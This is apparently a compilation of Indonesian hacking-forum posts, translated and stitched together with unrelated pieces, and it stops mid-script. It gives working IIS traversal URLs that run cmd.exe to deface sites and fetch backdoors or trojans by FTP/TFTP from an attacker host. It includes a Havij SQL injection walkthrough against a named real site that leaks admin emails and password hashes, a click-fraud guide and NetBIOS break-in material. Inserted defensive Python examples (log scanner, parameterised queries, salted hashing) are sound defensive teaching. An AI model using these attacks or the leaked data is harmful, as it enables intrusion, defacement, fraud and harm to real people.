- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah
Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
seng duwur aku copas neng forum sebelah soalnya aku orak pinter nulis dowo karo kie tak kei seko gaweaan ku dewe dudu2 copas
sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)
Download source Code
http://www.4shared.com/file/183402357/f15ee059/m4x.html
kalo ada kesalahan mohon di perbaiki soalnya saya cuma newbie yang masih punya kekurangan ...
1. We have to decide on our target website: http://www.target.loe, for example -->> http://www.target.com
2. Login
This is a directory that exists on that website.
The directory is configured with a certain script so that the files on the site are linked together; if there is a bug in that script, we can break into the site.
Some examples of login directories are:
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode --->> this is the code that can read the website's configuration script; it is this code that can read the CGI bug
the result of the coding may take 1-3 repetitions depending on the target we are going to hack
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. Target OS -->> this indicates the web server's OS certificate; ours are WinNT and Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. How It Works
Broadly speaking, this deface is done in three ways:
A.) Defacing a Website with the Echo Command
a.) In general: http://target/login/unicode/os/system/c+dir or http://www.target.com/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:
If the bug is present, our browser's title bar will say CGI Error, and we have broken into that website.
What our browser then shows is a listing of the contents of the web server's hard disk, just like the
dir command we run at the DOS prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) After successfully viewing the hard disk listing, we have to find the site's Path_Translated by changing the command /c+dir+c: into /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: becomes http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set (/c+dir+c: is changed into /c+set)
A CGI error will then come out whose contents show the batch system configuration of that web server. All sorts of things appear; the only one we need to look at is:
Path_Translated=d:\inetpub\wwwroot
c.) The next step is to copy the file cmd.exe under a new name, cmd1.exe or your own name, for example Jangkrik.exe, by changing
/c+dir+c: into /c+copy+c:
and then appending: winntsystem32cmd.exe+c:jangkrik.exe
so that we get:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe
now you can see that the file cmd1.exe is already in the directory:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
The real purpose of this is to shorten the command in our IE address bar
d.) Look for the index page at http://www.target.com/blah.ida
Sometimes the unknown .ida extension will respond with the local path.
If the .ida trick doesn't work, try using the InetPub directory:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm
this step isn't really necessary, but it doesn't hurt to be safe
with step b.) earlier we actually already know where index.htm is located, in other words the web folder
e.) if you think of yourself as a hacker, back up the site's front page first, because a hacker's job is not to destroy but to warn;
only amateurs, in other words people with a vandal mentality, go about damaging things without backing up index.htm. Otherwise we write it under a new file name like this:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrootindex.htm.bak
f.) Only then do we deface, i.e. echo, the front page with the command below:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
so as not to damage the site, we write to a new file name
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> writes the words You Were Hacked into
c:inetpubwwwrootindex.htm (the file being written) or c:inetpubwwwrootjangkrik.htm (the file being written)
For those of you who already understand HTML, if you want a cooler deface result use this command
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
notes:
%3d stands for the = sign
%22 stands for the " sign
%23 stands for the # sign
For those of you who understand HTML, you can do whatever you like with your deface. To make it look good, the deface can also be put in using Flash
g.) The last step, to see the result, is to read the other file using the 'type' command:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Or just look directly at http://www.target.com/ or http://www.target.com/jangkrik.htm
If you find that writing to this web server gives access denied, the second method is by tftp:
B.) Defacing a Website by tftp
The deface is done by uploading a file via TFTP32
To support TFTP we first download the software from http://www.download.com/ by typing the keyword TFTP32
You do this from a server machine (on a user machine it certainly won't work).
Uploading a file via TFTP32.. you don't need to copy cmd.exe, just use it directly.
let's start the upload; the commands follow these steps:
a.) We do step a.) of (A.), the deface with echo, to find the vulnerability or CGI bug
so that we get the hole, or the script http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
the next step is the upload itself. But beforehand we have prepared the htm/html file for the deface page (be creative here)
Once everything is ready, upload with the command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(your IP)+get+antique.htm(the file you want to upload)+ C:InetPubwwwrootmain.html
b.) We look again at what happens in our IE.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa. Congratulations, you have successfully uploaded your file using the TFTP32 software; now open the target website
The drawback of uploading files via TFTP32 is that sometimes a server (website) refuses to accept our upload. If that happens, use the first method above.
C.) By FTP from Our Own Website That We Have Filled with Our Deface Material
The first step is to create a free domain on a free web host. On that site we drop our deface web page, or a backdoor, virus or other destructive program
next we do the same as in step a.)(A.); after you know the CGI bug hole or the Unicode, you do the following steps:
a.) After we find the vulnerability
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Then we do the copy step as in step b.)(A.) ---->> its purpose is to shorten the Unicode command
c.) Then we look at +set to see the path translated
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Presumably the path is in c:inetpubwwwroot
d.) The next step is to create the ftp script
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Once the jangkrik.ftp script is finished, check the script again to see whether it is right
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Once the script is done, we run the script:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
open another IE to see whether the file has arrived yet
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
If it has been sent, congratulations
Notes:
What we actually put into the jangkrik.ftp script is this:
open geocities.com --->>> the script --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> the script -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> the script -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> destination folder --->>> the script -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> file type --->>> the script --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> file transfer command --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> command to disconnect from the web server ---->>> the script --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe With this method you can drop anything onto somebody's website, whether a deface page, backdoor, ircserver, bot, bnc, psybnc, trojan or virus..........
to send a binary file, change the file type from ascii to binary
The part above I copy-pasted from a neighbouring forum because I'm not good at writing long posts; this next part I'm giving you from my own work, not a copy-paste.
just sharing a tool for lazy people.. for those who can't be bothered with the manual method, give this one a try,
this tool has the same function as the one by om riluke (wekkzzz, acting like I know him wkwkwk)
but om riluke's build is detected as a trojan by Kaspersky, while this one isn't at all, and I've verified it myself
performance-wise it isn't much different.. from riluke's (that's just my opinion.. heheh)
Download source code
http://www.4shared.com/file/183402357/f15ee059/m4x.html
if there are mistakes please correct them, because I'm just a newbie who still has shortcomings ...
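A defender's counterpart to the traversal tutorial above, added here as an example and not taken from the post or from any tool it names: a small Python scanner that normalises request paths the way the vulnerable IIS decoder effectively did (percent-decoding twice for the ..%255c.. form, mapping the overlong UTF-8 sequences from the step-3 list such as ..%c0%af.. to the separator they stand for, and resolving escapes like the %3d, %22 and %23 from the notes), then flags the traversal, cmd.exe, file-write and tftp/ftp patterns the walkthrough depends on. The log lines are constructed, and "target" is the placeholder host the tutorial itself uses.

```python
"""Added example (not from the original post or from any tool it names): flag
IIS request paths that use the traversal tricks the tutorial relies on.
The log lines are constructed placeholders."""
import re
from urllib.parse import unquote_to_bytes

# Well-formed overlong UTF-8 encodings of '/' (0x2f) and '\' (0x5c). A correct
# decoder rejects these; the vulnerable IIS decoder accepted them, which is what
# makes ..%c0%af.. act as ../ (the other spellings in the tutorial's list are
# malformed and never decode to a separator).
OVERLONG = {
    b"\xc0\xaf": b"/",
    b"\xe0\x80\xaf": b"/",
    b"\xc1\x9c": b"\\",
    b"\xe0\x81\x9c": b"\\",
}

def normalise(path):
    """Decode like the vulnerable server effectively did: percent-decode twice
    (so %255c -> %5c -> '\\'), map overlong sequences to the separator they
    stand for, then fold '\\' to '/' and lower-case for matching."""
    raw = unquote_to_bytes(unquote_to_bytes(path))
    for seq, sep in OVERLONG.items():
        raw = raw.replace(seq, sep)
    return raw.decode("latin-1").replace("\\", "/").lower()

# Checked in this order so the result list is stable.
CHECKS = [
    ("double-encoding", lambda path, norm: "%25" in path.lower()),
    ("overlong-utf8",   lambda path, norm: any(s in unquote_to_bytes(path) for s in OVERLONG)),
    ("traversal",       lambda path, norm: "../" in norm),
    ("cmd-exe",         lambda path, norm: "cmd.exe" in norm),
    ("file-write",      lambda path, norm: ">" in norm),          # echo ... > file
    ("file-transfer",   lambda path, norm: "+tftp+" in norm or "+ftp+" in norm),
]

def classify(line):
    """Indicators for one log line of the constructed form 'METHOD path status';
    an empty list means the line looks benign."""
    parts = line.split()
    path = parts[1] if len(parts) > 1 else line
    norm = normalise(path)
    return [name for name, check in CHECKS if check(path, norm)]

def scan(lines):
    """Return (line, indicators) for every line that matched at least one check."""
    out = []
    for line in lines:
        hits = classify(line)
        if hits:
            out.append((line, hits))
    return out

# Constructed sample log lines in the shape of the tutorial's requests.
SAMPLE_LOG = [
    "GET /index.htm 200",
    "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: 502",
    "GET /scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+echo+You+Were+Hacked+>+c:%5Cinetpub%5Cwwwroot%5Cindex.htm 502",
    "GET /scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+tftp+-i+203.0.113.5+get+page.htm+c:%5Cinetpub%5Cwwwroot%5Cmain.html 502",
    "GET /products.asp?id=93 200",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(", ".join(hits), "<-", line)
```

The decode-then-match order matters: matching on the raw URL misses the %255c and %c0%af spellings entirely, which is exactly why the tutorial's requests got past the filters of the time. On a patched server the same normalisation is still useful for spotting scanners that keep trying these requests.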
A Sneaky Way to Get Dollars
Okay everyone.....!!!
I want to share the sneakiest way of getting dollars..
follow it step by step, ok....
Many people ask whether it is true that if we upgrade a Clixsense account to premium, the number of ads shown becomes large. The answer, for Indonesians, is actually NOT NECESSARILY. How come? Of course because Clixsense's system is geo-targeting, meaning advertisers can choose in which countries their ads are shown, and most of them target America. So those living in Asia probably rarely get a share of Clixsense ads, let alone Indonesia, which is looked down on. Don't expect that as soon as you upgrade the ads will increase every day. They do, but only at first; after that the ads disappear straight away, hahahaha…. that's why I'm often scolded by people who upgraded through my service in the past, hehehe. Such is the risk of doing good :)
So what is the purpose of my posting this? Not at all to scare you, not to recommend, let alone to forbid you from upgrading. That was just a little venting from me, who often gets scolded for never having mentioned this. But now I've found the secret, namely the secret to keeping the number of ads shown high. Use a proxy? Almost right, but most people use it the wrong way. It is true that using a proxy can increase the Clixsense ads that appear, but there is an initial step that gets missed. You have to be seen as living in America when you first register with Clixsense, meaning you have to use a proxy while signing up for Clixsense. If not, well, you're treated as living outside the world, hehehe, just kidding.
don't worry about not getting paid, this site is listed as an elite site at
http://ptc-investigation.com/clixsense.aspx
1.) first find a proxy, bro.... here http://www.xroxy.com
just google it, plenty of sites provide proxies
2.) sign up and choose America as the country, dude; sign up here
http://www.clixsense.com/?3411482
3.) in the Interests section, tick everything so there are lots of ads...once done, look at the ads under Browse Advertisements
if it works there are 5-10 standard ads...if it fails only 1....(such is Indonesia's fate hihihi)
4.) then, for those who already have capital, just invest right away, it's only 10$$
for those who are broke / have no capital ....just click every day..collect 10$$
then upgrade to premium; once upgraded, 500 ads
5 dollars a day just from clicking ...
oh yeah, if you want to click ads you also have to use an American proxy so there are lots of ads
and since there is an autoclicker, just use the autoclicker,
so no more clicking..your only job is to refresh the browser
every 5 minutes
I've updated the script so the timing is right..
how to use:
install greasemonkey first...find it here
https://addons.mozilla.org/id/firefox/ad...asemonkey/
then install the script:
http://userscripts.org/scripts/show/98442
once done just open the mozilla settings
under tools/options/content,
uncheck "block pop-up windows"
then ok...
once done, go straight to "Browse Advertisements"
let the bot run by itself hihihihi
the calculation goes like this
10 ads = 5 minutes..
60 minutes : 5 minutes = 12, and 12 x 10 ads = 120
120 x 0.01 = 1.2 $$ per hour wew
Happy.........\m/
that's the end of the tutorial, don't forget to sign up here
http://www.clixsense.com/?3411482
HAVIJ
Havij, a powerful tool for getting admin access using the SQL injection technique. Download the tool below (Hey r3dm0v3.. u coded an awesome tool)
Download Havij: http://www.ziddu.com/download/10136078/Havij1.10.rar.html SQL Injection Tool
Ok, I assume you have downloaded and installed it on your machine. Now let's try one of Israel's websites.. (hmmm…. why one of the websites in your country is made the guinea pig here is closely related to your military aggression against the ship of world volunteers for Palestine.. I am not a Muslim, but Israel's arrogance is what this tutorial stems from).
target website: http://www.xenia.co.il/index.php?page_id=93
as usual, put a ' into that URL:
http://www.xenia.co.il/index.php?page_id='93
you can see the result in the picture below. SQL Injection BUG
Now run the Havij tool, enter that link, click Analyze and wait a moment (this one takes less than 1 minute)….
the result:
Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia
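What the tool's Analyze step is keying on, as an added example that is not from the post or from Havij: the probe appends a quote to an integer parameter and looks for a database error leaking into the response (the "Keyword Found: mysql_num_rows()" line above is that leak). Below, in Python against a constructed sqlite3 table (the site in the post runs PHP/MySQL, but the pattern is the same), the string-concatenated query fails exactly that way, while the hardened version type-checks the parameter, binds it with a placeholder, and returns a generic result instead of the driver's message.

```python
"""Added example (not from the post or from Havij): the quote probe against a
string-built query, next to the parameterised form that defeats it.
The table, rows and request values are constructed; sqlite3 stands in for MySQL."""
import sqlite3

def make_db():
    """Constructed stand-in for the site's pages table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (page_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(93, "about"), (94, "contact")])
    return conn

def lookup_vulnerable(conn, page_id):
    """The request value is pasted into the SQL text, so a stray quote changes
    the statement, and the driver's error text is handed back to the caller:
    that error text is the signal an injection scanner watches for."""
    sql = f"SELECT title FROM pages WHERE page_id = {page_id}"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return {"status": "error", "detail": str(exc)}
    return {"status": "ok", "title": row[0] if row else None}

def lookup_hardened(conn, page_id):
    """Reject anything that is not an integer (an integer column needs no quote
    to inject into, so the type check matters), bind the value with a placeholder
    so it can only ever be data, and never echo driver errors to the client."""
    try:
        page_id = int(page_id)
    except (TypeError, ValueError):
        return {"status": "bad-request", "title": None}
    try:
        row = conn.execute("SELECT title FROM pages WHERE page_id = ?",
                           (page_id,)).fetchone()
    except sqlite3.Error:
        return {"status": "error", "detail": "internal error"}   # generic, no SQL text
    return {"status": "ok", "title": row[0] if row else None}

def compare(page_id):
    """Run the same request value through both handlers on a fresh table."""
    conn = make_db()
    return lookup_vulnerable(conn, page_id), lookup_hardened(conn, page_id)

if __name__ == "__main__":
    for value in ("93", "'93", "93 OR 1=1"):
        print(repr(value), compare(value))
```

The third probe value shows why the type check is part of the fix and not just the placeholder: with an integer column the injected text needs no quote at all, which is what the tool means by "injection type is Integer".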
w007s…… I Got the database… now click Tables then click Get Tables
w007s….. I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Now.. at this stage you need to find out… where the table holding the admin login information is. After tracing it, it turns out to be in the table nuke_users. Now let's look at the columns of the nuke_users table.
Tick nuke_users, then click Get Columns and wait a moment (hmmm… just 10 seconds).
w007ss…. cool.. got to check it out… I got the following columns
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name
uid
newsletter1
now.. these are the columns of the nuke_users table, holding the registration info, name, password, email and mobile number of the Admin of the website http://www.xenia.co.il.. now I'll try to get further access to this website.. hmmmm…. I'll just tick the columns:
name
email
pass
(the other columns aren't important.. I only want the username and password).
then click Get Data and
The result is as follows:
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=à åãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s…. it turns out this website has 3 administrators…
hmmmm… the passwords are HASHed, a.k.a. encrypted….. no problem… havij also has an md5 hash cracker..
Click MD5, enter one of the HASH values, then click start (wait a moment…. say 30 seconds). Then the result
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ… the password was cracked.. now just find the login page.
Click Find Admin, fill in Path to search with http://www.xenia.co.il/ then click start…. …. …………. Searching
Got that….
Page Found: http://www.xenia.co.il/login.php
Now all you have to do is go to the login page, enter the username and password and….
U gained an Access
Don`t Be Evil
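On the "cracked in 30 seconds" step, as an added example that is not from the post or from the tool: the dumped values are unsalted MD5 digests, so a cracker only has to hash candidate words and compare, and two accounts with the same password share one digest. The Python below shows that lookup next to salted PBKDF2 storage from the standard library, which is what a login table should hold instead. The wordlist and passwords are constructed, and the iteration count is an assumption kept low for speed (current guidance for PBKDF2-HMAC-SHA256 is several hundred thousand).

```python
"""Added example (not from the post or from Havij): why unsalted MD5 password
storage falls to a dictionary lookup, and a salted, iterated alternative.
Wordlist, passwords and stored records are constructed."""
import hashlib
import hmac
import os

def md5_hex(password):
    """The storage scheme the dumped table used: one fast, unsalted digest."""
    return hashlib.md5(password.encode()).hexdigest()

def crack_md5(digest, wordlist):
    """What an 'MD5 cracker' does: hash each candidate and compare. Because the
    digest depends only on the password, one table of precomputed digests
    serves every user of every site that uses the scheme."""
    for candidate in wordlist:
        if hmac.compare_digest(md5_hex(candidate), digest):
            return candidate
    return None

def find_shared_passwords(digests):
    """Unsalted digests also reveal which accounts share a password: identical
    password -> identical stored value. Returns the digests seen more than once."""
    seen, shared = set(), set()
    for d in digests:
        (shared if d in seen else seen).add(d)
    return shared

# Assumption: kept low so the example runs quickly; production counts for
# PBKDF2-HMAC-SHA256 are several hundred thousand iterations.
ITERATIONS = 100_000

def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated hash. The random salt makes precomputed tables useless
    and gives equal passwords different records; the iterations make each
    guess expensive. Record format: algo$iterations$salt_hex$dk_hex."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    wordlist = ["123456", "letmein", "password", "qwerty"]   # constructed
    digest = md5_hex("password")
    print("md5", digest, "->", crack_md5(digest, wordlist))
    record = hash_password("password")
    print("pbkdf2 record", record[:40] + "...")
    print("verify", verify_password("password", record), verify_password("guess", record))
```

The same dictionary attack can still be run against the PBKDF2 records, but each guess now costs one full PBKDF2 computation per account rather than one MD5 shared across all of them, which is the whole point of the salt and the iteration count.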
Friday, 10 June 2011
NetBios Explained
The Magic of NetBIOS
In this guide you will learn how to explore the Internet using Windows XP and NetBIOS:
• How to Install NetBIOS
• How to Use Nbtstat
• The Net View Command
• What to Do Once You Are Connected
• How to Break in Using the XP GUI
• More on the Net Commands
• How Crackers Break in as Administrator
• How to Scan for Computers that Use NetBIOS
• How to Play NetBIOS Wargames
• An Evil Genius Tip for Win NT Server Users
• Help for Windows 95, 98, SE and ME Users
Not many computers are reachable over the Internet using NetBIOS commands - maybe only a few million. But what the heck, a few million is enough to keep a hacker from getting bored. And if you know what to look for, you will discover that there are a lot of very busy hackers and Internet worms searching for computers they can break into by using NetBIOS commands. By learning the dangers of NetBIOS, you can get an appreciation for why it is a really, truly BAD!!! idea to use it.
*****************
Newbie note: a worm is a program that reproduces itself. For example, Code Red automatically searched over the Internet for vulnerable Windows computers and broke into them. So if you see an attempt to break into your computer, it may be either a human or a worm.
*****************
If you run an intrusion detection system (IDS) on your computer, you are certain to get a lot of alerts of NetBIOS attacks. Here's an example:
The firewall has blocked Internet access to your computer (NetBIOS Session) from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].
Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM
A Windows NT server on my home network, which has addresses that all start with 10.0.0, caused these alerts. In this case the server was just doing its innocent thing, looking for other Windows computers on my LAN (local area network) that might need to network with it. Every now and then, however, an attacker might pretend to have an address from your internal network even though it is attacking from outside.
If a computer from out on the Internet tries to open a NetBIOS session with one of mine, I'll be mighty suspicious. Here's one example of what an outside attack may look like:
The firewall has blocked Internet access to your computer (NetBIOS Name) from 999.209.116.123 (UDP Port 1028).
Time: 10/30/2002 11:10:02 AM
(The attacker's IP address has been altered to protect the innocent or the guilty, as the case may be.)
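As an added example (not part of the original guide), here is a small Python triage script for alerts in the format quoted above. It runs over constructed sample lines, assumes the reader's LAN is 10.0.0.0/24 as in the guide, separates LAN browser chatter from NetBIOS probes arriving from the Internet, and keeps redacted or malformed source addresses (like the altered 999.x one) in a bucket of their own instead of silently dropping them.

```python
import ipaddress
import re
from collections import Counter
from typing import Dict, Optional

# Constructed sample alerts modelled on the Zone Alarm messages quoted in the guide.
# 999.209.116.123 is the guide's deliberately altered address; 203.0.113.x and
# 198.51.100.x are documentation ranges standing in for real external sources.
SAMPLE_ALERTS = [
    "The firewall has blocked Internet access to your computer (NetBIOS Session) "
    "from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].",
    "The firewall has blocked Internet access to your computer (NetBIOS Name) "
    "from 999.209.116.123 (UDP Port 1028).",
    "The firewall has blocked Internet access to your computer (NetBIOS Name) "
    "from 203.0.113.45 (UDP Port 137).",
    "The firewall has blocked Internet access to your computer (NetBIOS Session) "
    "from 203.0.113.45 (TCP Port 4021) [TCP Flags: S].",
    "The firewall has blocked Internet access to your computer (HTTP) "
    "from 198.51.100.7 (TCP Port 51000) [TCP Flags: S].",
    "Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM",
]

# Address block of the home LAN in the guide (every address starts with 10.0.0).
# This is an assumption about the reader's own network; adjust to match.
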